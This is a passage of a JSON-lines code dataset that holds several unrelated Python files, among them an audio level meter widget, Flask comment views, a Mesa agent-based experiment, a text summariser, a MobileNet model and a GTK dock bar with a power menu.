channel_width, channels - 1, margin\n # )\n\n # normalize db-value to 0…1 and multiply with the height\n rms_px = [self.normalize_db(db) * height for db in self.levelrms]\n peak_px = [self.normalize_db(db) * height for db in self.levelpeak]\n decay_px = [self.normalize_db(db) * height for db in self.leveldecay]\n\n if self.height != height:\n self.height = height\n # setup gradients for all level bars\n self.bg_lg = self.gradient(0.25, 0.0, height)\n self.rms_lg = self.gradient(1.0, 0.0, height)\n self.peak_lg = self.gradient(0.75, 0.0, height)\n self.decay_lg = self.gradient(1.0, 0.5, height)\n\n # draw all level bars for all channels\n for channel in range(0, channels):\n # start-coordinate for this channel\n x = (channel * channel_width) + (channel * margin)\n\n # draw background\n cr.rectangle(x, 0, channel_width, height - peak_px[channel])\n cr.set_source(self.bg_lg)\n cr.fill()\n\n # draw peak bar\n cr.rectangle(\n x, height - peak_px[channel], channel_width, peak_px[channel])\n cr.set_source(self.peak_lg)\n cr.fill()\n\n # draw rms bar below\n cr.rectangle(\n x, height - rms_px[channel], channel_width,\n rms_px[channel] - peak_px[channel])\n cr.set_source(self.rms_lg)\n cr.fill()\n\n # draw decay bar\n cr.rectangle(x, height - decay_px[channel], channel_width, 2)\n cr.set_source(self.decay_lg)\n cr.fill()\n\n # draw medium grey margin bar\n if margin > 0:\n cr.rectangle(x + channel_width, 0, margin, height)\n cr.set_source_rgb(0.5, 0.5, 0.5)\n cr.fill()\n\n # draw db text-markers\n for db in [-40, -20, -10, -5, -4, -3, -2, -1]:\n text = str(db)\n (xbearing, ybearing,\n textwidth, textheight,\n xadvance, yadvance) = cr.text_extents(text)\n\n y = self.normalize_db(db) * height\n if y > peak_px[channels - 1]:\n cr.set_source_rgb(1, 1, 1)\n else:\n cr.set_source_rgb(0, 0, 0)\n cr.move_to((width - textwidth) - 2, height - y - textheight)\n cr.show_text(text)\n\n return True\n\n def normalize_db(self, db):\n # -60db -> 1.00 (very quiet)\n # -30db -> 0.75\n # -15db -> 0.50\n # -5db -> 0.25\n # -0db -> 0.00 (very loud)\n logscale = 1 - math.log10(-0.15 * db + 1)\n return self.clamp(logscale)\n\n def clamp(self, value, min_value=0, max_value=1):\n return max(min(value, max_value), min_value)\n\n def level_callback(self, rms, peak, decay, stream):\n meter_offset = self.channels * stream\n for i in range(0, self.channels):\n self.levelrms[meter_offset + i] = rms[i]\n self.levelpeak[meter_offset + i] = peak[i]\n self.leveldecay[meter_offset + i] = decay[i]\n self.queue_draw()\n","sub_path":"voctogui/lib/audioleveldisplay.py","file_name":"audioleveldisplay.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476500691","text":"#!/usr/bin/env python\n\nfrom distutils.core import setup\nfrom pip.req import parse_requirements\n\ninstall_reqs = parse_requirements(\"requirements.txt\", session=False)\n\nreqs = [str(ir.req) for ir in install_reqs]\n\nsetup(name='pgoapi',\n version='1.0',\n url='https://github.com/tejado/pgoapi',\n packages=['pgoapi'],\n install_requires=reqs)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"87838172","text":"from application import app, db\nfrom flask import redirect, render_template, request, url_for\nfrom flask_login import login_required, current_user\nfrom application.comment.models import Comment\nfrom 
application.comment.forms import CommentForm\nfrom application.auth.models import User\nfrom application.thread import views\n\n@app.route(\"/comment/delete/<comment_id>/\", methods=[\"POST\"])\n@login_required\ndef comment_delete(comment_id):\n comment = Comment.query.get(comment_id)\n\n db.session().delete(comment)\n db.session().commit()\n\n return redirect(url_for(\"thread_index\"))\n\n@app.route(\"/comment/edit/<comment_id>\", methods=[\"POST\"])\n@login_required\ndef comment_edit(comment_id):\n form = CommentForm(request.form)\n comment = Comment.query.get(comment_id)\n\n if not form.validate():\n return render_template(\"thread/editComment.html\", id=comment_id, form=form)\n\n Comment.query.filter_by(id=comment_id).update(\n dict(content=form.comment.data))\n\n db.session.commit()\n\n return redirect(url_for(\"thread_index\"))\n","sub_path":"application/comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"498344703","text":"import time\nimport numpy as np\nfrom mesa.batchrunner import BatchRunner\nfrom civil_violence_model import CivilViolenceModel\nfrom utils import read_configuration\n\n\ndef experiment_1(replicates=40, max_steps=200, graph_type=\"None\"):\n \"\"\"\n Experiment 1 - Run simulations of civil violence with network model.\n Generates the data used to compare the influence of network topology on the civil violence model.\n \"\"\"\n path = 'archives/saved_data_experiment_1_{0}_{1}'.format(int(time.time()), graph_type)\n\n configuration = read_configuration()\n model_params = {}\n model_params.update(configuration) # Overwritten user parameters don't appear in the graphic interface\n model_params.update({'seed': None})\n model_params['graph_type'] = graph_type\n model_params['max_iter'] = max_steps\n\n batch = BatchRunner(CivilViolenceModel,\n max_steps=max_steps,\n iterations=replicates,\n fixed_parameters=model_params,\n model_reporters={'All_Data': lambda m: m.datacollector,\n \"QUIESCENT\": lambda m: m.count_type_citizens(\"QUIESCENT\"),\n \"ACTIVE\": lambda m: m.count_type_citizens(\"ACTIVE\"),\n \"JAILED\": lambda m: m.count_type_citizens(\"JAILED\"),\n \"OUTBREAKS\": lambda m: m.outbreaks}, # attempt all\n display_progress=True)\n\n batch.run_all()\n\n batch_df = batch.get_model_vars_dataframe()\n batch_df = batch_df.drop('All_Data', axis=1)\n\n data = batch_df\n run_data = batch.get_collector_model()\n\n with open(path, 'ab') as f:\n np.save(f, data)\n\n run_path = path+'_run'\n with open(run_path, 'ab') as f:\n np.save(f, run_data)\n\n\nif __name__ == '__main__':\n # Change graph_type to compare the influence of each network\n experiment_1(replicates=2, max_steps=200, graph_type=\"None\")\n","sub_path":"civil_violence/experiment_1.py","file_name":"experiment_1.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"156324135","text":"from config import config\nimport pandas as pd\nimport joblib\n\ndef load_dataset(file_name):\n _data = pd.read_csv(config.DATAPATH + file_name)\n return _data\n\ndef save_pipeline(pipeline_to_save):\n save_file_name = 'lasso_regression_v1.pkl'\n save_path = config.SAVED_MODEL_PATH+save_file_name\n joblib.dump(pipeline_to_save, save_path)\n print(\"Saved Pipeline : \",save_file_name)\n\n\ndef load_pipeline(pipeline_to_load):\n save_path = config.SAVED_MODEL_PATH\n trained_model = 
joblib.load(save_path+pipeline_to_load)\n return trained_model","sub_path":"07_CleanUp/processing/data_management.py","file_name":"data_management.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"205089726","text":"import math\nimport random\nfrom time import sleep\n\nSOL_N = 900\nBATTLE_D =[]\nSOLS = []\nTURN = 0\n\ndef makesol():\n global SOL_N\n global SOLS\n for i in range(0,SOL_N):\n sol = [i,int(130+40*randomGaussian()),1+2*int(i%sqrt(SOL_N)),1+2*int(i/sqrt(SOL_N))]\n SOLS.append(sol)\n\ndef movesol(pos):\n global SOL_N\n pos[2] = pos[2] + random.randint(-1,1)\n pos[3] = pos[3] + random.randint(-1,1)\n for i in range(2,4):\n if pos[i] < 0:\n pos[i] = 0\n if pos[i] > 2*int(sqrt(SOL_N)):\n pos[i] = 2*int(sqrt(SOL_N))\n return(pos)\n\ndef checkstuck(pos,posx,posy):\n global SOLS\n for sol in SOLS:\n if sol[1] < 1:\n continue\n if pos[0] == sol[0]:\n continue\n if (pos[2] == sol[2]) and (pos[3] == sol[3]):\n bp = abs(pos[1] - sol[1])\n cp = random.randint(0,240)\n if cp > bp:\n (pos,sol) = battle(pos,sol)\n else:\n pos[2] = posx\n pos[3] = posy\n break\n return(pos)\n\ndef battle(sol_o,sol_d):\n bp = sol_o[1] - sol_d[1]\n cp = random.randint(-240,240)\n if cp <= bp:\n sol_d[1] = sol_d[1] - 10\n else:\n sol_o[1] = sol_o[1] - 10\n return(sol_o,sol_d)\n\ndef chart(bd):\n for i in range(1,4):\n fill(200)\n rect(0,height-160*i,width,160)\n fill(255)\n rect(5,height-160*i+5,width-10,150)\n for cbd in bd:\n if cbd[0] < 600:\n stroke(255,0,0)\n line(5+cbd[0],height-5,5+cbd[0],height-5-int((cbd[1]+cbd[2]+cbd[3])/6))\n stroke(0,0,255)\n line(5+cbd[0],height-5,5+cbd[0],height-5-int((cbd[2]+cbd[3])/6))\n stroke(0)\n line(5+cbd[0],height-5,5+cbd[0],height-5-int((cbd[3])/6))\n continue\n if cbd[0] < 1200:\n stroke(255,0,0)\n line(5+cbd[0]-600,height-5-160,5+cbd[0]-600,height-5-160-int((cbd[1]+cbd[2]+cbd[3])/6))\n stroke(0,0,255)\n line(5+cbd[0]-600,height-5-160,5+cbd[0]-600,height-5-160-int((cbd[2]+cbd[3])/6))\n stroke(0)\n line(5+cbd[0]-600,height-5-160,5+cbd[0]-600,height-5-160-int((cbd[3])/6))\n continue\n else:\n stroke(255,0,0)\n line(5+cbd[0]-1200,height-5-320,5+cbd[0]-1200,height-5-320-int((cbd[1]+cbd[2]+cbd[3])/6))\n stroke(0,0,255)\n line(5+cbd[0]-1200,height-5-320,5+cbd[0]-1200,height-5-320-int((cbd[2]+cbd[3])/6))\n stroke(0)\n line(5+cbd[0]-1200,height-5-320,5+cbd[0]-1200,height-5-320-int((cbd[3])/6))\n fill(0,255,0)\n textSize(18)\n for i in range(0,3):\n text(150+600*i,5+150,height-5-160*i)\n text(300+600*i,5+300,height-5-160*i)\n text(450+600*i,5+450,height-5-160*i)\n text(\"300\",5,height-5-50-160*i)\n text(\"600\",5,height-5-100-160*i)\n text(\"900\",5,height-5-150-160*i)\n\ndef mousePressed():\n if mouseButton == RIGHT:\n loop()\n\ndef setup():\n global SOL_N\n size(int(10*(2*sqrt(SOL_N)+2)),int(10*(2*sqrt(SOL_N)+2)))\n \nmakesol()\n\ndef draw():\n global SOL_N\n global SOLS\n global TURN\n #Draw field and sols\n background(100)\n for i in range(0,int(2*sqrt(SOL_N)+2)):\n line(5,5+i*10,10*(2*sqrt(SOL_N)+2)-5,5+i*10)\n line(5+i*10,5,5+i*10,10*(2*sqrt(SOL_N)+2)-5)\n for sol in SOLS:\n if sol[1] < 1:\n continue\n fill(sol[1],0,0)\n rect(5+10*sol[2],5+10*sol[3],10,10)\n #move and check sols\n for sol in SOLS:\n if sol[1] < 1:\n continue\n mx = sol[2]\n my = sol[3]\n sol = movesol(sol)\n sol = checkstuck(sol,mx,my)\n #Display sols in console\n sols = []\n sn = 0\n for sol in SOLS:\n if sol[1] < 1:\n continue\n sols.append(sol)\n sn = sn + 1\n print(\"TURN:%d\"%TURN)\n print(sols)\n #Resize 
field\n if sn <= 2:\n SOL_N = 25\n elif sn <= 8:\n SOL_N = 100\n elif sn <= 32:\n SOL_N = 400\n # make battle data\n if TURN < 1800:\n hsn = 0\n msn = 0\n lsn = 0\n for sol in SOLS:\n if sol[1] < 1:\n continue\n if sol[1] > 150:\n hsn = hsn + 1\n continue\n if sol[1] > 50:\n msn = msn + 1\n continue\n else:\n lsn = lsn + 1\n bd = [TURN,hsn,msn,lsn]\n BATTLE_D.append(bd)\n #Draw END\n if sn == 1:\n chart(BATTLE_D)\n fill(200)\n rect(width/2-170,height/2+20,340,60)\n fill(255)\n rect(width/2-165,height/2+25,330,50)\n fill(0)\n textSize(36)\n textAlign(CENTER,CENTER)\n text(\"TURN END:%d\"%TURN,width/2,height/2+50)\n noLoop()\n #Draw turn and number of sols when mouse pressed\n if mousePressed and (mouseButton == LEFT):\n fill(200)\n rect(mouseX+15,mouseY-15,185,60)\n fill(255)\n rect(mouseX+20,mouseY-10,175,50)\n fill(0)\n textSize(24)\n text(\"TURN:%d\"%TURN,mouseX+30,mouseY+12)\n text(\"SOLS = %d\"%sn,mouseX+30,mouseY+37)\n noLoop()\n\n TURN = TURN + 1\n","sub_path":"competition.pyde","file_name":"competition.pyde","file_ext":"pyde","file_size_in_byte":5140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"88941539","text":"import numpy as np\nimport math\n\nLATENCY_FRAMES = 12\n\nclass cars():\n\tdef __init__(self):\n\t\tself.boxes = []\n\n\tdef get_sensible_boxes(self, new_boxes):\n\t\tfor prev_box in self.boxes:\n\t\t\tprev_box.current_frame = False\n\t\tfor box in new_boxes:\n\t\t\tmin_dist = 1000\n\t\t\tepsilon = 20\n\t\t\tclosest_centroid = None\n\t\t\tnew_car_box = car_box(box)\n\t\t\tprint('ss{}'.format(box))\n\t\t\tfor prev_box in self.boxes:\n\t\t\t\tdist = prev_box.dist(new_car_box.centroid) \n\t\t\t\tif(dist < min_dist):\n\t\t\t\t\tprint('dist ' + str(dist))\n\t\t\t\t\tmin_dist = dist\n\t\t\t\t\tclosest_centroid = prev_box\n\t\t\tif(closest_centroid != None):\n\t\t\t\tif(prev_box.current_frame == False):\n\t\t\t\t\tif(not closest_centroid.same_center(new_car_box)):\n\t\t\t\t\t\tself.boxes.append(new_car_box)\n\t\t\telse:\n\t\t\t\tprint('append')\n\t\t\t\tprint(new_car_box.box)\n\t\t\t\tself.boxes.append(new_car_box)\n\t\tfor box in self.boxes:\n\t\t\tif(not box.current_frame):\n\t\t\t\tif(box.suspitious > 0):\n\t\t\t\t\tprint('suspitious' + str(box.suspitious))\n\t\t\t\t\tif(box.suspitious >= LATENCY_FRAMES):\n\t\t\t\t\t\tprint('remove')\n\t\t\t\t\t\tprint(box.box)\n\t\t\t\t\t\tself.boxes.remove(box)\n\t\t\t\t\tbox.suspitious += 1\n\t\t\t\telse:\n\t\t\t\t\tprint('suspitious 1')\n\t\t\t\t\tprint(box.box)\n\t\t\t\t\tbox.suspitious = 1\n\t\toutput_boxes = []\t\t\n\t\tfor box in self.boxes:\n\t\t\t#if(box.suspitious <= 0):\n\t\t\toutput_boxes.append(box.get_output_box())\n\t\t\tprint('centroid')\n\t\t\tprint(box.centroid)\n\t\t\tprint('prev_centroids')\n\t\t\tprint(box.prev_centroids)\n\t\treturn output_boxes\n\nclass car_box():\n\tdef __init__(self, box):\n\t\tself.box = box\n\t\tself.centroid = car_box.get_center(box)\n\t\tself.width = abs(box[0][0] - box[1][0])\n\t\tself.height = abs(box[0][1] - box[1][1])\n\t\tself.prev_centroids = []\n\t\tself.prev_width = []\n\t\tself.prev_height = []\n\t\tself.current_frame = True\n\t\tself.suspitious = 1\n\n\tdef same_center(self, box):\n\t\twidths = np.hstack((self.prev_width, [self.width]))\n\t\theights = np.hstack((self.prev_height, [self.height]))\n\t\tepsilon = max(60, 1.3 * (sum(widths) + sum(heights))/float(len(widths) + len(heights)))\n\t\tif(self.dist(box.centroid) < epsilon):\n\t\t\tif(len(self.prev_centroids) >= 
LATENCY_FRAMES):\n\t\t\t\tself.prev_centroids.pop(0)\n\t\t\t\tself.prev_width.pop(0)\n\t\t\t\tself.prev_height.pop(0)\n\t\t\tself.prev_centroids.append(self.centroid)\n\t\t\tself.prev_width.append(self.width)\n\t\t\tself.prev_height.append(self.height)\n\t\t\tself.box = box.box\n\t\t\tself.centroid = box.centroid\n\t\t\tself.width = box.width\n\t\t\tself.height = box.height\n\t\t\tself.current_frame = True\n\t\t\tself.suspitious = 0\n\t\t\treturn True\n\t\treturn False\n\t\n\t@staticmethod\n\tdef get_center(box):\n\t\treturn ((box[0][0] + box[1][0])/2.0, (box[0][1] + box[1][1])/2.0)\n\n\tdef dist(self, point):\n\t\treturn math.sqrt(math.pow(point[0] - self.centroid[0], 2) + math.pow(point[1] - self.centroid[1], 2))\n\n\tdef get_output_box(self):\n\t\tcenter = self.center_point(self.prev_centroids, self.centroid)\n\t\twidth = np.hstack((self.prev_width, [self.width]))\n\t\twidth = sum(width) / float(len(width))\n\t\theight = np.hstack((self.prev_height, [self.height]))\n\t\theight = sum(height) / float(len(height))\n\t\tresult = ((int(round(center[0] - width / 2.0)), int(round(center[1] - height / 2.0))), (int(round(center[0] + width / 2.0)), int(round(center[1] + height / 2.0))))\n\t\tprint('output')\n\t\tprint(result)\n\t\treturn result\n\n\tdef center_point(self, points, another_point):\n\t\txs = 0\n\t\tys = 0\n\t\tfor point in points:\n\t\t\txs += point[0]\n\t\t\tys += point[1]\n\t\txs+=another_point[0]\n\t\tys+=another_point[1]\n\t\treturn (xs/(len(points) + 1), ys/(len(points) + 1))\n\n\n","sub_path":"cars.py","file_name":"cars.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"7680395","text":"import nltk\nimport numpy as np\nimport re\nfrom nltk.corpus import stopwords, brown\nfrom nltk.cluster.util import cosine_distance\nfrom operator import itemgetter\n\nnltk.download('stopwords')\nnltk.download('brown')\n# np.seterr(divide='ignore', invalid='ignore')\n\n# parameters\nMIN_WORD_LEN = 2\nMIN_WORDS_IN_SENT = 4\n\n\ndef page_rank(sim_matrix, eps=0.0001, d=0.85):\n R = np.ones(len(sim_matrix))\n\n while True:\n r = np.ones(len(sim_matrix)) * (1 - d) + d * sim_matrix.T.dot(R)\n if abs(r - R).sum() <= eps:\n return r\n R = r\n\n # ones_matrix = np.ones(len(sim_matrix))\n # P = ones_matrix / len(sim_matrix)\n # # print(P)\n #\n # while True:\n # new_P = np.ones(len(sim_matrix)) * (1 - d) / len(sim_matrix) + d * sim_matrix.T.dot(P)\n # delta = abs(new_P - P).sum()\n # if delta <= eps:\n # return new_P\n # P = new_P\n\n\ndef sentence_similarity(sentence_1, sentence_2, stop_words):\n if stop_words is None:\n stop_words = []\n\n sent1a = []\n for word in sentence_1:\n sent1a.append(word.lower())\n\n sent2a = []\n for word in sentence_2:\n sent2a.append(word.lower())\n\n all_words = list(set(sent1a + sent2a))\n\n vector1 = [0] * len(all_words)\n vector2 = [0] * len(all_words)\n\n for word in sentence_1:\n if word in stop_words:\n continue\n vector1[all_words.index(word.lower())] += 1\n\n for word in sentence_2:\n if word in stop_words:\n continue\n vector2[all_words.index(word.lower())] += 1\n\n cos_dist = cosine_distance(vector1, vector2)\n\n val = 1.0 - cos_dist\n\n return val\n\n\ndef build_similarity_matrix(sentences, stop_words):\n num_sentences = len(sentences)\n s = np.zeros((num_sentences, num_sentences))\n\n for index1 in range(num_sentences):\n for index2 in range(num_sentences):\n if index1 == index2:\n continue\n sentence_sim = sentence_similarity(sentences[index1], 
sentences[index2], stop_words)\n s[index1][index2] = sentence_sim\n\n for index3 in range(len(s)):\n if s[index3].sum() == 0:\n continue\n s[index3] /= s[index3].sum()\n\n print(s)\n\n return s\n\n\ndef main():\n stop_words = stopwords.words('english')\n\n with open(\"in1.txt\", \"r\") as input_file:\n text = input_file.readlines()\n\n sentences0 = nltk.sent_tokenize(text[0])\n\n sentences = []\n for sent in sentences0:\n # Removing Square Brackets and Extra Spaces\n sent = sent.lower()\n sent = re.sub(r'\\[[0-9]*\\]', ' ', sent)\n sent = re.sub(r'\\s+', ' ', sent)\n\n # Removing special characters and digits\n formatted_sent = re.sub('[^a-zA-Z]', ' ', sent)\n formatted_sent = re.sub(r'\\s+', ' ', formatted_sent)\n\n words = nltk.word_tokenize(formatted_sent)\n\n # Removing single letter words\n for word in words:\n if len(word) < MIN_WORD_LEN:\n words.remove(word)\n\n if len(words) > MIN_WORDS_IN_SENT:\n sentences.append(words)\n\n s = build_similarity_matrix(sentences, stop_words)\n\n sentence_ranks = page_rank(s)\n\n # print(sentence_ranks)\n\n # Collect the sentence indexes sorted by descending rank\n ranked_sentence_indexes = [item[0] for item in sorted(enumerate(sentence_ranks), key=lambda item: -item[1])]\n\n selected_sentences = sorted(ranked_sentence_indexes[:7])\n\n summary = itemgetter(*selected_sentences)(sentences)\n\n # for sentence in summary:\n # print(' '.join(sentence))\n\n\nmain()\n","sub_path":"backend/nlp/src/old/summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"82246922","text":"# coding: utf-8\n# Original implementation from peisuke\n# https://github.com/peisuke/DeepLearningSpeedComparison/blob/master/chainer/mobilenet/predict.py\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\n\n\nclass ConvBN(chainer.Chain):\n def __init__(self, inp, oup, stride):\n super(ConvBN, self).__init__()\n with self.init_scope():\n self.conv=L.Convolution2D(inp, oup, 3, stride=stride, pad=1, nobias=True)\n self.bn=L.BatchNormalization(oup)\n\n def __call__(self, x):\n h = F.relu(self.bn(self.conv(x)))\n return h\n\n\nclass ConvDW(chainer.Chain):\n def __init__(self, inp, oup, stride):\n super(ConvDW, self).__init__()\n with self.init_scope():\n self.conv_dw=L.DepthwiseConvolution2D(inp, 1, 3, stride=stride, pad=1, nobias=True)\n self.bn_dw=L.BatchNormalization(inp)\n self.conv_sep=L.Convolution2D(inp, oup, 1, stride=1, pad=0, nobias=True)\n self.bn_sep=L.BatchNormalization(oup)\n\n def __call__(self, x):\n h = F.relu(self.bn_dw(self.conv_dw(x)))\n h = F.relu(self.bn_sep(self.conv_sep(h)))\n return h\n \n\nclass MobileNet(chainer.Chain):\n def __init__(self, n_classes=1000, n_base_units=32):\n super().__init__()\n self.n_classes = n_classes\n with self.init_scope():\n self.conv_bn = ConvBN(3, n_base_units, 2)\n self.conv_ds_2 = ConvDW(n_base_units, n_base_units * 2, 1)\n self.conv_ds_3 = ConvDW(n_base_units * 2, n_base_units * 4, 2)\n self.conv_ds_4 = ConvDW(n_base_units * 4, n_base_units * 4, 1)\n self.conv_ds_5 = ConvDW(n_base_units * 4, n_base_units * 8, 2)\n self.conv_ds_6 = ConvDW(n_base_units * 8, n_base_units * 8, 1)\n self.conv_ds_7 = ConvDW(n_base_units * 8, n_base_units *16, 2)\n\n self.conv_ds_8 = ConvDW(n_base_units *16, n_base_units *16, 1)\n self.conv_ds_9 = ConvDW(n_base_units *16, n_base_units *16, 1)\n self.conv_ds_10 = ConvDW(n_base_units *16, n_base_units *16, 1)\n self.conv_ds_11 = ConvDW(n_base_units *16, n_base_units *16, 1)\n 
self.conv_ds_12 = ConvDW(n_base_units *16, n_base_units *16, 1)\n\n self.conv_ds_13 = ConvDW(n_base_units *16, n_base_units *32, 2)\n self.conv_ds_14 = ConvDW(n_base_units *32, n_classes, 1)\n\n def __call__(self, x, t):\n h = self.predict(x)\n loss = F.softmax_cross_entropy(h, t)\n chainer.report({'loss': loss, 'accuracy': F.accuracy(h, t)}, self)\n return loss\n \n def predict(self, x):\n h = self.conv_bn(x)\n h = self.conv_ds_2(h)\n h = self.conv_ds_3(h)\n h = self.conv_ds_4(h)\n h = self.conv_ds_5(h)\n h = self.conv_ds_6(h)\n h = self.conv_ds_7(h)\n h = self.conv_ds_8(h)\n h = self.conv_ds_9(h)\n h = self.conv_ds_10(h)\n h = self.conv_ds_11(h)\n h = self.conv_ds_12(h)\n h = self.conv_ds_13(h)\n h = self.conv_ds_14(h)\n h = F.average_pooling_2d(h, 7, stride=1)\n h = F.reshape(h, (h.data.shape[0], h.data.shape[1]))\n return h\n","sub_path":"image-classification/mobilenet.py","file_name":"mobilenet.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"421558430","text":"'''\nA sorted array is rotated at some point, find that point via binary search\n'''\n\nimport random\n\nA = list(range(100))\nn = random.randint(0, len(A) - 1)\nA = A[n:] + A[:n]\n\ndef find_pivot(A):\n left, right = 0, len(A) - 1\n while left < right:\n midpoint = left + (right - left) // 2\n if A[midpoint] > A[right]:\n left = midpoint + 1\n else:\n right = midpoint\n return left\n\npivot = find_pivot(A)\nprint('Rotated', A)\nprint('A[{i}] = {j}'.format(i=pivot, j=A[pivot]))\nprint('Unrotated', A[pivot:] + A[:pivot])\n","sub_path":"searching/rotation_point.py","file_name":"rotation_point.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476884103","text":"#!/usr/bin/env python3\n\nimport gi\ngi.require_version('Gtk', '3.0')\ngi.require_foreign('cairo')\nfrom gi.repository import Gtk, Gdk, Gio\n\nimport cairo\nimport xcffib as xcb\nimport xcffib.xproto as xproto\n\nimport asyncio\nimport os\nimport struct\nimport time\n\n# locals\nimport battery\nimport bspwm\n\nclass Win(Gtk.Window):\n def __init__(self, show=True, **kargs):\n Gtk.Window.__init__(self, **kargs)\n\n # enable true transparency\n screen = self.get_screen()\n visual = screen.get_rgba_visual()\n if visual != None and screen.is_composited():\n self.set_visual(visual)\n\n # be able to draw stuff ourselves\n self.set_app_paintable(True)\n # self.connect('draw', self.area_draw)\n\n if show:\n self.show_all()\n\n def screen_geom(self):\n # get screen size\n screen = self.get_screen()\n monitor = screen.get_monitor_at_window(screen.get_active_window())\n return screen.get_monitor_geometry(monitor)\n\n def property_change(self, prop, prop_type, form, mode, data):\n # Gobject has no API to set properties (strangely), so we have to use xcb instead\n conn = xcb.connect()\n def get_atom(atom):\n ia = conn.core.InternAtom(False, len(atom), atom)\n return ia.reply().atom\n\n conn.core.ChangePropertyChecked(int(mode), self.get_window().get_xid(), get_atom(prop), get_atom(prop_type),\n form, int(len(data) / form * 8), data).check()\n\nclass Dock(Win):\n def __init__(self, **kwargs):\n Win.__init__(self, show=False, **kwargs)\n\n # make it a dock\n self.set_type_hint(Gdk.WindowTypeHint.DOCK)\n self.set_decorated(False)\n # self.set_resizable(False)\n\n # set size\n geom = self.screen_geom()\n self.move(0, 0)\n self.resize(30, geom.height)\n # self.set_default_size(30, 500)\n # 
self.set_size_request(30, 500)\n\n # win_geom = Gdk.Geometry()\n # win_geom.max_width = 30\n # win_geom.max_height = geom.height\n # self.set_geometry_hints(self, win_geom, Gdk.WindowHints.MAX_SIZE)\n\n # required for property_change\n self.show_all()\n\n # left, right, top, bottom, left_start_y, left_end_y, right_start_y, right_end_y, top_start_x, top_end_x, bottom_start_x, bottom_end_x\n strut = [0] * 12\n strut[0] = 30\n strut[5] = geom.height\n self.property_change('_NET_WM_STRUT_PARTIAL', 'CARDINAL', 32, Gdk.PropMode.REPLACE, struct.pack('I' * 12, *strut))\n self.property_change('_NET_WM_STRUT', 'CARDINAL', 32, Gdk.PropMode.REPLACE, struct.pack('I' * 4, *strut[0:4]))\n\nclass Clock(Gtk.Label):\n def __init__(self, fmt):\n Gtk.Label.__init__(self)\n self.time_fmt = fmt\n self.get_style_context().add_class(\"clock\")\n\n async def loop():\n while True:\n self.update_time()\n await asyncio.sleep(1)\n\n asyncio.ensure_future(loop())\n\n def update_time(self):\n self.set_markup(time.strftime(self.time_fmt))\n self.set_tooltip_text(time.strftime('%c'))\n\ndef PowerButton():\n menu = Gtk.Menu()\n for l,e in [\n (\"shutdown\", lambda _: os.system(\"systemctl poweroff\")),\n (\"reboot\", lambda _: os.system(\"systemctl reboot\")),\n (\"logout\", lambda _: os.system(\"systemctl --user stop x11@{}.target\".format(os.getenv(\"DISPLAY\")))),\n (None, None),\n (\"hibernate\", lambda _: os.system(\"systemctl hibernate\")),\n (\"suspend\", lambda _: os.system(\"systemctl suspend\")),\n (\"hybrid sleep\", lambda _: os.system(\"systemctl hybrid-sleep\")),\n ]:\n if l is None:\n menu.append(Gtk.SeparatorMenuItem())\n continue\n mi = Gtk.MenuItem(l)\n mi.connect(\"activate\", e)\n menu.append(mi)\n menu.show_all()\n\n button = Gtk.Button(name=\"power-button\", relief=Gtk.ReliefStyle.NONE)\n button.add(Gtk.Label(label=\"⏻\"))\n button.connect('clicked', lambda _: menu.popup_at_pointer())\n\n return button\n\ndef EBox(widget, *args, **kwargs):\n event_box = Gtk.EventBox(*args, **kwargs);\n event_box.add(widget)\n return event_box\n\ndef init():\n win = Dock()\n\n top = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)\n mid = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, valign=Gtk.Align.CENTER)\n bot = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, valign=Gtk.Align.END)\n bigbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)\n bigbox.set_homogeneous(True)\n\n bigbox.add(EBox(top, name=\"topbox\"))\n bigbox.add(EBox(mid, name=\"midbox\"))\n bigbox.add(EBox(bot, name=\"botbox\"))\n win.add(bigbox)\n\n mid.add(bspwm.DesktopView())\n\n bot.add(Clock('%I\\n%M\\n%S'))\n bot.add(battery.Battery())\n bot.add(PowerButton())\n\n async def tray():\n await asyncio.sleep(0.2)\n await asyncio.create_subprocess_exec(\"stalonetray\", \"-c\", \"/dev/null\",\n \"--vertical\", \"--slot-size\", \"30\", \"--window-strut\", \"left\",\n \"--transparent\", \"--grow-gravity\", \"N\", \"--sticky\")\n\n asyncio.ensure_future(tray())\n\n win.show_all()\n win.connect('delete-event', lambda *args: asyncio.get_event_loop().stop())\n\n return win\n","sub_path":"bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":5274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"216905691","text":"\"\"\"\nParses time expressions into dateutil relative dates::\n\n >>> def rr(expr):\n ... 
